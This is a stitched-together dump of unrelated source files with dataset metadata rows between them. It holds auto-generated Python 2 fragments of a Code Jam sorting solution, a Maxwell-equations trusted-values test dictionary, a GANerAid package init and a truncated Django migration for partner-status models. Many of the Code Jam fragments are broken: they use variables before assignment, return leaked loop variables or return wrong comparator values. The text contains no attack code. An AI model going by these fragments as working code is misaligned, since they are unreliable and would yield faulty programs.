t1 = a0 * (100 - b1)
t2 = a1 * (100 - b0)
if t1 == t2:
return i0 - i1
if t1 < t2:
return -1
return t2
def func_f934468f89cb45c8a4b70346569a4385(b1, i1, a0, i0, b0, a1):
t1 = a0 * (100 - b1)
t2 = a1 * (100 - b0)
if t1 == t2:
return i0 - i1
if t1 < t2:
return -1
return t1
def func_47ec88d4e6114641bfbabfb467600948(i1, i0, b0, a1, t1):
t2 = a1 * (100 - b0)
if t1 == t2:
return i0 - i1
if t1 < t2:
return -1
return 1
def func_12401b870b684b4f95bdb7de5924e4ba(b1, i1, a0, i0, b0, a1):
t1 = a0 * (100 - b1)
t2 = a1 * (100 - b0)
if t1 == t2:
return i0 - i1
if t1 < t2:
return -1
return 1
def func_b6b2c5c5fb1a487481c3c11cc50b2c4c(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
return a
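# Input-parsing variants: the test-case format is a count n followed by two
# whitespace-separated integer rows a and b; each variant below re-reads the
# same lines and returns a different intermediate (n, a, b, or the leaked
# comprehension variable x, which only resolves under Python 2).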
def func_028c9d6a82fe4a49896a39afd6bf2cb0(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
return n
def func_04e45c4df0b94764a279ca197bc13993(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
return x
def func_b7d16fcfc676481985537cb0eb07cd14(ifile):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
return x
def func_641a3673eeff4aa1afae8f144cbf5735(ifile):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
return b
def func_36f8f8ff5ddc4ac882f2778373ab5dfe(ifile):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
return a
def func_ee52b9da72844a14bc1c6ecc0f3d5041(ifile):
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
return x
def func_1ea389778d3a4ee68ee98bb4e913866f(ifile):
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
return b
def func_76dabfa7c1e549d7ba2008573d6a4676(n, a):
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return b
def func_faf7dddfbdf9413fa36f1852e194e48b(n, a):
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return i
def func_bbd46932ae2a46aa818791d32067e497(n, a):
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return c
def func_f5b7e05ab84d4bd68748a499420d1ccd(n, a):
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return x
def func_0bf8a26b6c49449ebc9d346e9132115d(n, b, a):
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return c
def func_18d6b2dd29bc4c2ba4b3062baaa05882(n, b, a):
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return i
def func_4b9d73c090e04e8cb8f959ee7cd8b6e4(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
return b
def func_4821faf4c781449684cb39c0a063e9e4(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
return a
def func_85a77d7221c645a1858a73b74c68061c(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
return n
def func_f2d5d6e16d3d4e93bf010bc6e17357a7(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
return x
def func_61e46193133344879a73f2cfda5bede7(ifile):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
return b
def func_b2db179e4c034907a1ba2cc84230f1fc(ifile):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
return x
def func_7533a65bf1284707985c77fc64d0c2fe(ifile):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
return a
def func_c8590f26fe7a4b16be859434fff1ee0d(ifile, n, a):
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return c
def func_879d894ad26b40ee82f9dd62ccba185f(ifile, n, a):
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return b
def func_76529abb087249698e192d7cb0dbdcd9(ifile, n, a):
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return x
def func_bd01feca9b5948dca0a1ae06a7a83527(ifile, n, a):
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return i
def func_33f402c50113497baa53c5aa744bcd31(n, a):
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return x
def func_8f8517388f844a619023df51cf91a4c3(n, a):
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return b
def func_a598d1abfaa24c0db0b2cfbfd1c45ef8(n, a, b):
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return c
def func_8a57b381827442328bc7c02971e9ef2c(n, a, b):
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return i
def func_4166d316af9a47299cd7d34a20dc36a6(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
return n
def func_4ff86d440c0e493fbe303c7a6ca7672d(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
return b
def func_6499b5ab034a4866820b675a3d6527b0(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
return x
def func_a3f5590e2a6d4d1f8bf795922e510fec(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
return a
def func_9fd91330916b45ca9699b1a84bf0c169(ifile, n):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return a
def func_8613d1fc3c674df5a3918610d0ececdc(ifile, n):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return i
def func_64d04298ce6445989deed97ceee02a76(ifile, n):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return x
def func_987dea216a844058a19db58a925b3be9(ifile, n):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return b
def func_0ea5f47350ab48b1914929b3a87cc92b(ifile, n):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return c
def func_cbd9c13fb31f47248276bba6cc56c5b5(ifile, n, a):
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return x
def func_71eb0c0b770446df99efdc16df567fae(ifile, n, a):
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return i
def func_20379ff73d704c6d93c0860c0621951a(ifile, n, a):
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return c
def func_bcecd5e8b92544359db5cbf8f70b0365(ifile, n, a):
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return b
def func_3795ba7bf99e4f8699aedeba629d62a2(n, a, b):
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return ' '.join([str(x[0]) for x in c])
def func_27501f4426b14800b48759a7438ec720(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return n
def func_26bbde5fc6b7421d9511fbb96f693043(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return a
def func_814bf6ab53c04ff3bd47a766fbd6b033(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return i
def func_748b857b32554510ab3f9ce39ed73e99(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return c
def func_a070153e7d6f4a40ab87d07627aa643f(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return x
def func_cb99a173a8a8426a97866a2253418376(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return b
def func_4cf63dab3b94472a9ed381e23322e7d2(ifile, n):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return b
def func_2208fe3be570469d8cb2d1755755c64f(ifile, n):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return i
def func_ce761dfdda6b41eea917feb83f900fe0(ifile, n):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return c
def func_47152c1a10c74e429b9f0b1505bfdc9b(ifile, n):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return x
def func_cbec1b258b7b4ba984df8ceda939af11(ifile, n):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return a
def func_eafa6ce6b19b4fa6aca5588cba2e772f(ifile, n, a):
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return ' '.join([str(x[0]) for x in c])
def func_61b13cb389d54a3ea3a07a327e388b67(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return i
def func_6f31e22478cf47b48ad700a048d72ac5(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return n
def func_353be2f06c7d49269f372ed5a5a49d0f(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return b
def func_c8d99ee814dc4adf889a14b49df2005b(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return a
def func_dff86119810e4082b8d94abfe7269e45(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return x
def func_7445f1b69ebc4400a682151247b99769(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return c
def func_780e59c9d95c4b538c3638b58effef52(ifile, n):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return ' '.join([str(x[0]) for x in c])
def func_46fdf5677b314175b44429eb4dbf52e3(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return ' '.join([str(x[0]) for x in c])
def func_196a1e8258674fe59110fd2226fc4d39():
ifile = open('codejam/test_files/Y12R5P1/A.in')
n = int(ifile.readline())
return n
def func_2a8b4838b3c34fc59dc4a532e844a828():
ifile = open('codejam/test_files/Y12R5P1/A.in')
n = int(ifile.readline())
return ifile
def func_e5a27358beee438cbe2a29165f0b793f(ifile):
n = int(ifile.readline())
for i in range(n):
print 'Case #%d: %s' % (i + 1, foo(ifile))
return i
def func_2325808604e84f1684f82c2c10e96de5(ifile):
n = int(ifile.readline())
for i in range(n):
print 'Case #%d: %s' % (i + 1, foo(ifile))
return n
def func_5744fca327334117a22f7e62f2cc2b19(n, ifile):
for i in range(n):
print 'Case #%d: %s' % (i + 1, foo(ifile))
ifile.close()
return i
def func_2b69b3287b734e3b87af4cb9e855b41a():
ifile = open('codejam/test_files/Y12R5P1/A.in')
n = int(ifile.readline())
for i in range(n):
print 'Case #%d: %s' % (i + 1, foo(ifile))
return i
def func_8fba89633c5747f79689e23a22c67751():
ifile = open('codejam/test_files/Y12R5P1/A.in')
n = int(ifile.readline())
for i in range(n):
print 'Case #%d: %s' % (i + 1, foo(ifile))
return ifile
def func_e578810c598442c6bd0ff33296b8f226():
ifile = open('codejam/test_files/Y12R5P1/A.in')
n = int(ifile.readline())
for i in range(n):
print 'Case #%d: %s' % (i + 1, foo(ifile))
return n
def func_473c09f63cf94921b0e4e3884b348d7d(ifile):
n = int(ifile.readline())
for i in range(n):
print 'Case #%d: %s' % (i + 1, foo(ifile))
ifile.close()
return n
def func_f00218d1e51641cabefcb6d3806916f1(ifile):
n = int(ifile.readline())
for i in range(n):
print 'Case #%d: %s' % (i + 1, foo(ifile))
ifile.close()
return i
def func_02329a4f087145f3aade3ac4547faa94():
ifile = open('codejam/test_files/Y12R5P1/A.in')
n = int(ifile.readline())
for i in range(n):
print 'Case #%d: %s' % (i + 1, foo(ifile))
ifile.close()
return i
def func_8606d4a36ce447c4b3dde55ea7a5771f():
ifile = open('codejam/test_files/Y12R5P1/A.in')
n = int(ifile.readline())
for i in range(n):
print 'Case #%d: %s' % (i + 1, foo(ifile))
ifile.close()
return ifile
def func_de8186583fec438cb339ef25fe2391ac():
ifile = open('codejam/test_files/Y12R5P1/A.in')
n = int(ifile.readline())
for i in range(n):
print 'Case #%d: %s' % (i + 1, foo(ifile))
ifile.close()
return n
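# All of the `sorted(c, cmp=cmp1)` calls above are Python 2 only. A minimal
# Python 3 sketch of the same pipeline (`solve_case` is an illustrative
# name; `cmp1` is assumed to be the two-argument comparator defined earlier
# in this file):
from functools import cmp_to_key

def solve_case(ifile):
    n = int(ifile.readline())
    a = [int(x) for x in ifile.readline().split()]
    b = [100.0 - int(x) for x in ifile.readline().split()]
    c = sorted([(i, a[i], b[i]) for i in range(n)], key=cmp_to_key(cmp1))
    return ' '.join(str(t[0]) for t in c)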
| 27.040816
| 86
| 0.58965
| 3,005
| 18,550
| 3.607987
| 0.048918
| 0.053496
| 0.080244
| 0.091035
| 0.71758
| 0.717211
| 0.717211
| 0.717211
| 0.717211
| 0.714721
| 0
| 0.162804
| 0.244043
| 18,550
| 685
| 87
| 27.080292
| 0.610354
| 0
| 0
| 0.821569
| 0
| 0
| 0.024313
| 0.016981
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.003922
| null | null | 0.021569
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bb3ab167ce1cc80e88e00a0a36cb6d909cb1d11d
| 2,073
|
py
|
Python
|
Maxwell/tests/trusted_values_dict.py
|
ksible/nrpytutorial
|
4ca6e9da22def2a9c9bcbcad75847fd1db159f4b
|
[
"BSD-2-Clause"
] | 1
|
2019-12-23T05:31:25.000Z
|
2019-12-23T05:31:25.000Z
|
Maxwell/tests/trusted_values_dict.py
|
ksible/nrpytutorial
|
4ca6e9da22def2a9c9bcbcad75847fd1db159f4b
|
[
"BSD-2-Clause"
] | null | null | null |
Maxwell/tests/trusted_values_dict.py
|
ksible/nrpytutorial
|
4ca6e9da22def2a9c9bcbcad75847fd1db159f4b
|
[
"BSD-2-Clause"
] | 2
|
2019-11-14T03:31:18.000Z
|
2019-12-12T13:42:52.000Z
|
from mpmath import mpf, mp, mpc
from UnitTesting.standard_constants import precision
mp.dps = precision
trusted_values_dict = {}
# Generated on: 2019-08-09
trusted_values_dict['MaxwellCartesian_ID_System_I__MaxwellCartesian_ID__globals'] = {'AidD[0]': mpf('0.0'), 'AidD[1]': mpf('0.0'), 'AidD[2]': mpf('0.0'), 'EidD[0]': mpf('-0.00097872468362340314605833563251625'), 'EidD[1]': mpf('0.00145603432525138889836187271486631'), 'EidD[2]': mpf('0.00715458022830078274232579882161936'), 'psi_ID': mpf('0.0')}
# Generated on: 2019-08-09
trusted_values_dict['MaxwellCartesian_ID_System_II__MaxwellCartesian_ID__globals'] = {'AidD[0]': mpf('0.0'), 'AidD[1]': mpf('0.0'), 'AidD[2]': mpf('0.0'), 'EidD[0]': mpf('-0.00097872468362340314605833563251625'), 'EidD[1]': mpf('0.00145603432525138889836187271486631'), 'EidD[2]': mpf('0.00715458022830078274232579882161936'), 'psi_ID': mpf('0.0')}
# Generated on: 2019-09-01
trusted_values_dict['MaxwellCartesian_Evol_System_I__MaxwellCartesian_Evol__globals'] = {'ArhsD[0]': mpf('-1.00477972570544082930865670277853'), 'ArhsD[1]': mpf('-0.90933746004565019216414611946675'), 'ArhsD[2]': mpf('-1.35077580602625568761965269004577'), 'ErhsD[0]': mpf('-1.16609030551770015540915913490108'), 'ErhsD[1]': mpf('-1.74087427825341859356723017723538'), 'ErhsD[2]': mpf('-1.30944694400130436898902550312893'), 'psi_rhs': mpf('-1.83203053745211606147965285066827'), 'Cviolation': mpf('0.406620534858606586636231871034108')}
# Generated on: 2019-09-01
trusted_values_dict['MaxwellCartesian_Evol_System_II__MaxwellCartesian_Evol__globals'] = {'ArhsD[0]': mpf('-1.00477972570544082930865670277853'), 'ArhsD[1]': mpf('-0.90933746004565019216414611946675'), 'ArhsD[2]': mpf('-1.35077580602625568761965269004577'), 'ErhsD[0]': mpf('-6.01063531302656695008599192642279'), 'ErhsD[1]': mpf('2.34503060736374273411073958457946'), 'ErhsD[2]': mpf('-2.01267184443281847814748713664109'), 'psi_rhs': mpf('-0.467406274906266405722021772817243'), 'Gamma_rhs': mpf('-1.83022327141949924992491839801391'), 'Cviolation': mpf('0.406620534858606586636231871034108')}
| 115.166667
| 595
| 0.759768
| 231
| 2,073
| 6.61039
| 0.238095
| 0.049771
| 0.026195
| 0.086444
| 0.629993
| 0.629993
| 0.629993
| 0.629993
| 0.629993
| 0.629993
| 0
| 0.433367
| 0.051616
| 2,073
| 17
| 596
| 121.941176
| 0.343337
| 0.047757
| 0
| 0
| 1
| 0
| 0.670391
| 0.538852
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
24780dcc9f7bdb0ec8457b019da3ce395ca3e795
| 206
|
py
|
Python
|
GANerAid/__init__.py
|
TeamGenerAid/GANerAid
|
b6d68833f9483e1215e1547f54a207927c5685e6
|
[
"MIT"
] | 1
|
2021-07-05T16:35:25.000Z
|
2021-07-05T16:35:25.000Z
|
GANerAid/__init__.py
|
TeamGenerAid/GANerAid
|
b6d68833f9483e1215e1547f54a207927c5685e6
|
[
"MIT"
] | null | null | null |
GANerAid/__init__.py
|
TeamGenerAid/GANerAid
|
b6d68833f9483e1215e1547f54a207927c5685e6
|
[
"MIT"
] | null | null | null |
import GANerAid.ganeraid
import GANerAid.utils
import GANerAid.data_preprocessor
import GANerAid.evaluation_report
import GANerAid.experiment_runner
import GANerAid.experiment_runner
import GANerAid.logger
| 25.75
| 33
| 0.898058
| 25
| 206
| 7.24
| 0.4
| 0.541436
| 0.265193
| 0.331492
| 0.40884
| 0.40884
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067961
| 206
| 7
| 34
| 29.428571
| 0.942708
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
24a2cce00762e7f1865ae5e5e55ed1a33f953844
| 13,667
|
py
|
Python
|
partners/migrations/0005_auto_20191024_1225.py
|
uno-isqa-8950/uno-cpi
|
c8fa01eb253e6a56046009c551a84c36c28cd8da
|
[
"MIT"
] | 13
|
2018-08-30T16:03:18.000Z
|
2019-11-25T07:08:43.000Z
|
partners/migrations/0005_auto_20191024_1225.py
|
uno-isqa-8950/uno-cpi
|
c8fa01eb253e6a56046009c551a84c36c28cd8da
|
[
"MIT"
] | 814
|
2018-08-30T02:28:55.000Z
|
2022-03-11T23:31:45.000Z
|
partners/migrations/0005_auto_20191024_1225.py
|
uno-isqa-8950/uno-cpi
|
c8fa01eb253e6a56046009c551a84c36c28cd8da
|
[
"MIT"
] | 6
|
2018-09-16T05:35:49.000Z
|
2019-10-17T02:44:19.000Z
|
# Generated by Django 2.2.1 on 2019-10-24 17:25
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import simple_history.models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('projects', '0012_engagementactivitytype_historicalengagementactivitytype_historicalprojectengagementactivity_projecte'),
('partners', '0004_auto_20190420_1044'),
]
operations = [
migrations.CreateModel(
name='CecPartnerStatus',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=80, unique=True)),
('description', models.CharField(blank=True, max_length=255, null=True)),
],
options={
'verbose_name': 'CEC Partner Status',
'verbose_name_plural': 'CEC Partner Statuses',
},
),
migrations.CreateModel(
name='PartnerStatus',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=80, unique=True)),
('description', models.CharField(blank=True, max_length=255, null=True)),
],
options={
'verbose_name': 'Partner Status',
'verbose_name_plural': 'Partner Statuses',
},
),
migrations.AddField(
model_name='communitypartner',
name='acronym',
field=models.CharField(blank=True, max_length=255, null=True, unique=True),
),
migrations.AddField(
model_name='communitypartner',
name='online_only',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='historicalcommunitypartner',
name='acronym',
field=models.CharField(blank=True, db_index=True, max_length=255, null=True),
),
migrations.AddField(
model_name='historicalcommunitypartner',
name='online_only',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='communitypartner',
name='address_line1',
field=models.CharField(blank=True, max_length=1024, null=True),
),
migrations.AlterField(
model_name='communitypartner',
name='address_line2',
field=models.CharField(blank=True, max_length=1024, null=True),
),
migrations.AlterField(
model_name='communitypartner',
name='city',
field=models.CharField(blank=True, max_length=25, null=True),
),
migrations.AlterField(
model_name='communitypartner',
name='country',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='communitypartner',
name='county',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='communitypartner',
name='state',
field=models.CharField(blank=True, max_length=15, null=True),
),
migrations.AlterField(
model_name='communitypartner',
name='zip',
field=models.CharField(blank=True, max_length=10, null=True),
),
migrations.AlterField(
model_name='historicalcommunitypartner',
name='address_line1',
field=models.CharField(blank=True, max_length=1024, null=True),
),
migrations.AlterField(
model_name='historicalcommunitypartner',
name='address_line2',
field=models.CharField(blank=True, max_length=1024, null=True),
),
migrations.AlterField(
model_name='historicalcommunitypartner',
name='city',
field=models.CharField(blank=True, max_length=25, null=True),
),
migrations.AlterField(
model_name='historicalcommunitypartner',
name='country',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='historicalcommunitypartner',
name='county',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='historicalcommunitypartner',
name='state',
field=models.CharField(blank=True, max_length=15, null=True),
),
migrations.AlterField(
model_name='historicalcommunitypartner',
name='zip',
field=models.CharField(blank=True, max_length=10, null=True),
),
migrations.CreateModel(
name='HistoricalPartnerStatus',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('name', models.CharField(db_index=True, max_length=80)),
('description', models.CharField(blank=True, max_length=255, null=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical Partner Status',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalCecPartnerStatus',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('name', models.CharField(db_index=True, max_length=80)),
('description', models.CharField(blank=True, max_length=255, null=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical CEC Partner Status',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalCecPartActiveYrs',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('start_semester', models.CharField(blank=True, choices=[('', '----------'), ('Fall', 'Fall'), ('Spring', 'Spring'), ('Summer', 'Summer')], max_length=20)),
('end_semester', models.CharField(blank=True, choices=[('', '----------'), ('Fall', 'Fall'), ('Spring', 'Spring'), ('Summer', 'Summer')], max_length=20)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('camp_partner', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='partners.CampusPartner')),
